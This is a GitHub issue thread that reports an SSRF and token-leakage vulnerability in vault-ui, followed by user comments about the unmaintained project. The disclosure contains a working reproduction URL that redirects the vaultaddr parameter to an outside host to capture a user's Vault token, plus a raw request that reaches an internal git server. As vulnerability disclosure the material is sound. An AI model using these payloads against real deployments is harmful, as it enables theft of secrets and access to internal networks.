vault-ui icon indicating copy to clipboard operation
vault-ui copied to clipboard

Published 20 hours ago verified publisher icon djenriquez

Security issue. Token leakage

Open anton00706 opened this issue 6 years ago • 5 comments

Hi. Our security team tested your UI and found a vulnerability. Here is a feedback from them:

image_20180807115237122 Step-to-reproduce Token leakage:

  1. Login to vault ui with token
  2. visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
  3. Open file token.txt at 192.168.3.105

Access token stolen.

Internal resources access:

  1. Disable VPN and send request GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1 Host: spb-off-vault01.team.wrike.com:8000 ...

you got git.wrke.in content, but we assume, that attacker can no has access to it

Actual result Token stolen, internal resources accessed

Expected result No SSRF

Area of Responsibility Other

Recommendation Do not user input, take value of target host from configuration.

Currently in /src/vaultapi.js: let vaultAddr = req.query.vaultaddr;

but should be something like this: let vaultAddr =config['vaultaddr']

anton00706 avatar Aug 15 '18 15:08 anton00706

Soooo. any suggestions for another UI that's not this one @anton00706 ?

ghost avatar Jan 07 '19 13:01 ghost

@reverendtimm the official one ? See https://www.hashicorp.com/resources/vault-oss-ui-introduction

JorisInsign avatar Jan 07 '19 14:01 JorisInsign

@JorisInsign noice. Thanks.

ghost avatar Jan 07 '19 14:01 ghost

  • What is the status of this issue?
  • Repro steps are not very clear.

rptxcosmo avatar Jan 30 '19 15:01 rptxcosmo

There has been no response from a developer, nor has there been a commit since this issue was opened.

So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.

Bitblade avatar Feb 05 '19 18:02 Bitblade